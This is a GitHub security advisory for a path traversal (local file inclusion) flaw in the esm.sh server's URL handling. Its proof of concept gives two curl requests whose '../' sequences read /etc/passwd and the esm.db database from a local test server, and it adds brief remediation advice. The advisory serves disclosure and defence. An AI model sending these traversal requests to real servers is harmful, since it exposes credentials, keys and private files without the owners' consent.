Skip to content

Local File Inclusion in esm.sh

High
ije published GHSA-49pv-gwxp-532r Sep 17, 2025

Package

gomod github.com/esm-dev/esm.sh (Go)

Affected versions

<= v136

Patched versions

None

Description

Summary

A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise.
Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.

Vulnerable code snippet is in this file:

esm.sh/server/router.go

Line 1168 in c62f191

content, err := os.Open(filename)

Proof of Concept

  1. Using this default config file that I copy from the repo, the server is running at http://localhost:9999 with this command go run server/esmd/main.go --config=config.json
{
  "port": 9999,
  "npmRegistry": "https://registry.npmjs.org/",
  "npmToken": "******"
}
  1. Trigger the LFI vulnerability by sending this command below to read a local file
# read /etc/passwd
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'

# or read the database esm.db file
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'
poc-image

Remediation

Simply remove any .. in the URL path before actually process the file. See more details in this guide

Credits

Severity

High

CVE ID

CVE-2025-59341

Weaknesses

Relative Path Traversal

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as .. that can resolve to a location that is outside of that directory. Learn more on MITRE.

Credits